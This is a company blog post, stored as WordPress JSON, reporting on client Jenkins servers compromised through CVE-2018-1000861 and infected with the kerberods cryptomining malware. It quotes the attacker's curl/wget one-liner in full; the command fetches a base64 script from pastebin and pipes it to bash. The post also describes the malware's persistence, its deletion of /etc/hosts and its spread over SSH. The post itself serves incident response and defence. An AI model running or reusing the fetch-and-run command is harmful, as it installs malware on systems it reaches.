{"id":2679,"date":"2019-05-19T21:20:21","date_gmt":"2019-05-19T19:20:21","guid":{"rendered":"https:\/\/geko2.factoryfy.com\/jenkins-exploit-cryptocurrency-mining-malware\/"},"modified":"2021-11-03T17:13:51","modified_gmt":"2021-11-03T16:13:51","slug":"jenkins-cryptocurrency-malware","status":"publish","type":"post","link":"https:\/\/geko.cloud\/en\/jenkins-cryptocurrency-malware\/","title":{"rendered":"Jenkins Exploit Cryptocurrency mining malware"},"content":{"rendered":"<p>A few days ago, our alert system notified us that several of the servers of some clients had a totally abrupt load growth in the system, even in some cases a direct downtime occurred.<\/p>\n<p>After entering the systems, after a brief initial analysis of the Geko team, we detected that the systems had been compromised by an attack on them derived from a vulnerability in their Jenkins platform through the recognized exploit CVE-2018-1000861. To summarize, it basically allows you to inject and execute code on the server.<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-601 aligncenter\" src=\"https:\/\/geko2.factoryfy.com\/wp-content\/uploads\/jenkins-vulnerability-attack-300x260.png\" alt=\"\" width=\"415\" height=\"359\" \/><\/p>\n<p>This scheme details the steps that the script does, but summarizing and after our analysis we basically detect:<\/p>\n<ul>\n<li>A curl and wget are run that directly downloads the base 64 script and runs it (curl -fsSL https:\/\/pastebin.com\/raw\/B3Ppi9ub||wget -q -O &#8211; https:\/\/pastebin.com\/raw \/ B3Ppi9ub) | base64 -d | bash<\/li>\n<li>Depending on the operating system it has one behavior or another<\/li>\n<li>Install a service called netdns in which it makes a call to a binary which is the malware code called kerberods which limits the use of the CPU&#8217;s dedicating all -1 to the mining of cryptocurrencies<\/li>\n<li>Delete the \/ etc \/ hosts file<\/li>\n<li>Installs several cron files <em>oanacroane<\/em> and several such as the apache cron that constantly download the code and run it in case you want to stop the threat<\/li>\n<li>The process is configured to launch in runlevel 3<\/li>\n<li>The running binary process is camouflaged making it undetectable<\/li>\n<li>In debian systems we also detect the <em>watchbdog<\/em> process<\/li>\n<li>The initial script in addition to executing the binary and creating the process also accesses the known_hosts file and tries to jump using ssh cross-keys to other systems. Being a Jenkins system, this attack is more than likely to have an effect.<\/li>\n<\/ul>\n<p>After several hours of investigation, we detected that it was necessary to run a busybox on Linux in order to eliminate the masked process. Geko used this: https:\/\/busybox.net\/downloads\/binaries\/1.30.0-i686\/busybox<\/p>\n<p>And thanks to some processes in the repo https:\/\/git.laucyun.com\/laucyun and our own scripts, we managed to eliminate the threat until we were able to secure the systems again and reinstall the compromised ones.<\/p>\n<p>Keep in mind that attack scripts have a high level of depth and complexity, and despite being reverse engineered, as it is a constantly improving repository by the group of Chinese attackers &#8220;Rocke Group&#8221;, it is practically impossible to guarantee 100 % that the system is fully protected.<\/p>\n<p>The most surprising thing of all is that a priori it is a malware that infects automatically and in the README of the malware code repo the group of hacker attackers indicate that their intentions are not to break anything, simply to identify security vulnerabilities and remove some &#8220;slice&#8221; mining cryptocurrencies without going any further &#8230; they even detail the possibility of helping in case the infected require support &#8230; which we obviously did not do.<\/p>\n<h3>Good practice guide:<\/h3>\n<ul>\n<li>Avoid having curl and \/ or wget binaries in our systems<\/li>\n<li>Avoid running jenkins with root user<\/li>\n<li>Avoid publishing the jenkins service, ssh or any vulnerable service or port<\/li>\n<li>Have all the services, SO etc in the latest security version that the manufacturer indicates<\/li>\n<li>Avoid crossing ssh keys<\/li>\n<li>Maintain sanitation of known_hosts files<\/li>\n<li>Monitor 24X7 production systems with pre and proactive alerts<\/li>\n<li>Always check the backup content of our systems<\/li>\n<li>Version the scripts and files (crons, hosts, etc) to be able to recover the systems in case of attack<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>We leave you the link to our public repository where you have a first version of the cleaning script that we use summarized:<\/p>\n<p><a href=\"https:\/\/github.com\/GekoCloud\/cryptocurrency-mining-malware-clean-tool\">https:\/\/github.com\/GekoCloud\/cryptocurrency-mining-malware-clean-tool<\/a><\/p>\n<p>&nbsp;<\/p>\n<p>From Geko we will be happy to help you in case of identifying this vulnerability in your system, <a href=\"https:\/\/geko.cloud\/en\/contact\/\">contact us<\/a>!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A few days ago, our alert system notified us that several of the servers of some clients had a totally abrupt load growth in the system, even in some cases a direct downtime occurred. After entering the systems, after a brief initial analysis of the Geko team, we detected that the systems had been compromised [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2392,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[67],"tags":[83],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Jenkins Exploit Cryptocurrency mining malware - Geko Cloud<\/title>\n<meta name=\"description\" content=\"In this case we describe the experience and actions that the Geko Cloud technical team took to deal with an attack resulting from the jenkins vulnerability CVE-2018-1000861 that infected our clients&#039; servers with the kerberods malware that mined cryptocurrencies and infected their servers.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Jenkins Exploit Cryptocurrency mining malware - Geko Cloud\" \/>\n<meta property=\"og:description\" content=\"In this case we describe the experience and actions that the Geko Cloud technical team took to deal with an attack resulting from the jenkins vulnerability CVE-2018-1000861 that infected our clients&#039; servers with the kerberods malware that mined cryptocurrencies and infected their servers.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\" \/>\n<meta property=\"og:site_name\" content=\"Geko Cloud\" \/>\n<meta property=\"article:published_time\" content=\"2019-05-19T19:20:21+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-11-03T16:13:51+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png\" \/>\n\t<meta property=\"og:image:width\" content=\"920\" \/>\n\t<meta property=\"og:image:height\" content=\"797\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Jose Luis S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@geko_cloud\" \/>\n<meta name=\"twitter:site\" content=\"@geko_cloud\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\"},\"author\":{\"name\":\"Jose Luis S\u00e1nchez\",\"@id\":\"https:\/\/geko.cloud\/es\/#\/schema\/person\/d06aff498ebfbc75b5010ebe92af41ed\"},\"headline\":\"Jenkins Exploit Cryptocurrency mining malware\",\"datePublished\":\"2019-05-19T19:20:21+00:00\",\"dateModified\":\"2021-11-03T16:13:51+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\"},\"wordCount\":632,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/geko.cloud\/es\/#organization\"},\"image\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png\",\"keywords\":[\"Jenkins\"],\"articleSection\":[\"Labs\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\",\"url\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\",\"name\":\"Jenkins Exploit Cryptocurrency mining malware - Geko Cloud\",\"isPartOf\":{\"@id\":\"https:\/\/geko.cloud\/es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png\",\"datePublished\":\"2019-05-19T19:20:21+00:00\",\"dateModified\":\"2021-11-03T16:13:51+00:00\",\"description\":\"In this case we describe the experience and actions that the Geko Cloud technical team took to deal with an attack resulting from the jenkins vulnerability CVE-2018-1000861 that infected our clients' servers with the kerberods malware that mined cryptocurrencies and infected their servers.\",\"breadcrumb\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage\",\"url\":\"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png\",\"contentUrl\":\"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png\",\"width\":920,\"height\":797,\"caption\":\"jenkins\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/geko.cloud\/en\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Jenkins Exploit Cryptocurrency mining malware\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/geko.cloud\/es\/#website\",\"url\":\"https:\/\/geko.cloud\/es\/\",\"name\":\"Geko Cloud\",\"description\":\"Servicios de consultor\u00eda cloud y devops\",\"publisher\":{\"@id\":\"https:\/\/geko.cloud\/es\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/geko.cloud\/es\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/geko.cloud\/es\/#organization\",\"name\":\"Geko Cloud\",\"url\":\"https:\/\/geko.cloud\/es\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/geko.cloud\/es\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/geko.cloud\/wp-content\/uploads\/2021\/10\/geko_logo-positivo.png\",\"contentUrl\":\"https:\/\/geko.cloud\/wp-content\/uploads\/2021\/10\/geko_logo-positivo.png\",\"width\":1650,\"height\":809,\"caption\":\"Geko Cloud\"},\"image\":{\"@id\":\"https:\/\/geko.cloud\/es\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/geko_cloud\",\"https:\/\/www.instagram.com\/gekocloud\/\",\"https:\/\/www.linkedin.com\/company\/gekocloud\",\"https:\/\/www.youtube.com\/channel\/UC5EFLCqUM7fEaXSa_0nWowQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/geko.cloud\/es\/#\/schema\/person\/d06aff498ebfbc75b5010ebe92af41ed\",\"name\":\"Jose Luis S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/geko.cloud\/es\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/ebfd055d4dba456220c682523fcc237c?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/ebfd055d4dba456220c682523fcc237c?s=96&d=mm&r=g\",\"caption\":\"Jose Luis S\u00e1nchez\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Jenkins Exploit Cryptocurrency mining malware - Geko Cloud","description":"In this case we describe the experience and actions that the Geko Cloud technical team took to deal with an attack resulting from the jenkins vulnerability CVE-2018-1000861 that infected our clients' servers with the kerberods malware that mined cryptocurrencies and infected their servers.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/","og_locale":"en_US","og_type":"article","og_title":"Jenkins Exploit Cryptocurrency mining malware - Geko Cloud","og_description":"In this case we describe the experience and actions that the Geko Cloud technical team took to deal with an attack resulting from the jenkins vulnerability CVE-2018-1000861 that infected our clients' servers with the kerberods malware that mined cryptocurrencies and infected their servers.","og_url":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/","og_site_name":"Geko Cloud","article_published_time":"2019-05-19T19:20:21+00:00","article_modified_time":"2021-11-03T16:13:51+00:00","og_image":[{"width":920,"height":797,"url":"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png","type":"image\/png"}],"author":"Jose Luis S\u00e1nchez","twitter_card":"summary_large_image","twitter_creator":"@geko_cloud","twitter_site":"@geko_cloud","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#article","isPartOf":{"@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/"},"author":{"name":"Jose Luis S\u00e1nchez","@id":"https:\/\/geko.cloud\/es\/#\/schema\/person\/d06aff498ebfbc75b5010ebe92af41ed"},"headline":"Jenkins Exploit Cryptocurrency mining malware","datePublished":"2019-05-19T19:20:21+00:00","dateModified":"2021-11-03T16:13:51+00:00","mainEntityOfPage":{"@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/"},"wordCount":632,"commentCount":0,"publisher":{"@id":"https:\/\/geko.cloud\/es\/#organization"},"image":{"@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage"},"thumbnailUrl":"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png","keywords":["Jenkins"],"articleSection":["Labs"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/","url":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/","name":"Jenkins Exploit Cryptocurrency mining malware - Geko Cloud","isPartOf":{"@id":"https:\/\/geko.cloud\/es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage"},"image":{"@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage"},"thumbnailUrl":"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png","datePublished":"2019-05-19T19:20:21+00:00","dateModified":"2021-11-03T16:13:51+00:00","description":"In this case we describe the experience and actions that the Geko Cloud technical team took to deal with an attack resulting from the jenkins vulnerability CVE-2018-1000861 that infected our clients' servers with the kerberods malware that mined cryptocurrencies and infected their servers.","breadcrumb":{"@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage","url":"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png","contentUrl":"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png","width":920,"height":797,"caption":"jenkins"},{"@type":"BreadcrumbList","@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/geko.cloud\/en\/"},{"@type":"ListItem","position":2,"name":"Jenkins Exploit Cryptocurrency mining malware"}]},{"@type":"WebSite","@id":"https:\/\/geko.cloud\/es\/#website","url":"https:\/\/geko.cloud\/es\/","name":"Geko Cloud","description":"Servicios de consultor\u00eda cloud y devops","publisher":{"@id":"https:\/\/geko.cloud\/es\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/geko.cloud\/es\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/geko.cloud\/es\/#organization","name":"Geko Cloud","url":"https:\/\/geko.cloud\/es\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/geko.cloud\/es\/#\/schema\/logo\/image\/","url":"https:\/\/geko.cloud\/wp-content\/uploads\/2021\/10\/geko_logo-positivo.png","contentUrl":"https:\/\/geko.cloud\/wp-content\/uploads\/2021\/10\/geko_logo-positivo.png","width":1650,"height":809,"caption":"Geko Cloud"},"image":{"@id":"https:\/\/geko.cloud\/es\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/geko_cloud","https:\/\/www.instagram.com\/gekocloud\/","https:\/\/www.linkedin.com\/company\/gekocloud","https:\/\/www.youtube.com\/channel\/UC5EFLCqUM7fEaXSa_0nWowQ"]},{"@type":"Person","@id":"https:\/\/geko.cloud\/es\/#\/schema\/person\/d06aff498ebfbc75b5010ebe92af41ed","name":"Jose Luis S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/geko.cloud\/es\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/ebfd055d4dba456220c682523fcc237c?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/ebfd055d4dba456220c682523fcc237c?s=96&d=mm&r=g","caption":"Jose Luis S\u00e1nchez"}}]}},"_links":{"self":[{"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/posts\/2679"}],"collection":[{"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/comments?post=2679"}],"version-history":[{"count":2,"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/posts\/2679\/revisions"}],"predecessor-version":[{"id":5180,"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/posts\/2679\/revisions\/5180"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/media\/2392"}],"wp:attachment":[{"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/media?parent=2679"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/categories?post=2679"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/geko.cloud\/en\/wp-json\/wp\/v2\/tags?post=2679"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}